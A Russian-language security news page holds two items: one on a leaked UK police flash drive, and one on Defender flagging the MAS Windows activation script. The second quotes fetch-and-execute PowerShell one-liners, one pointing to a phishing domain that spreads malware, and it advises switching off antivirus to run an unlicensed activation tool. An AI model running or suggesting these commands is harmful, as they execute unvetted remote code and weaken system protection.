Секретные файлы полиции Великобритании оказались на улице

Секретные файлы полиции Великобритании оказались на улице

Флешка, с логотипом полицейского департамента графства Манчестер, на которой содержалось более  2000 файлов с совершенно секретной и конфиденциальной информацией была найдена рядом со станцией.

Как стало известно, файлы, не были зашифрованы и содержали такую информацию как подробное описание стратегии при ядерной атаке и нападении, в случае войны, учебное пособие по взрывной технике, использовании дубинок и щитов. Более того, на флешке содержались персональные данные старших офицеров полиции, а именно, их имена, звания и подразделения.

В настоящий момент, ведется расследование, каким образом флешка оказалась на улице.

По словам прохожего, нашедшего флешку, скорей всего, эта флешка принадлежала офицеру старшего ранга. Но стоит задуматься, чтобы произошло если бы эти данные попали к террористам или злоумышленникам. Здесь собрана вся информация, и можно было бы узнать какие специалисты имеются в арсенале полиции и где располагаются их базы. Таким образом, они смогли бы быть всегда на один шаг впереди полиции.

По мнению представителя компании Check Point, этот инцидент подчеркивает факт того, что многие организации до сих пор не предусматривают меры по защите информации на портативных устройствах. Ведь никто не застрахован от кражи или случайной потери накопителя. Компаниям следует снизить влияние человеческого фактора и предусмотреть возможность автоматического шифрования при копировании информации на съемный носитель, будь то CD или карта памяти. Это даст дополнительную защиту и уверенность в том, что пользователи не смогут просто отключить или обойти установленную защиту.

Это не первый случай утечки информации в департаменте полиции. Ранее, с флешки был запущен вирус Conficker во внутреннюю сеть департамента, в результате чего департамент оставался отрезанным в течение трех дней. Так же, в начале года, по ошибке был отправлен файл с персональными данными на 10000 человек по электронной почте.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru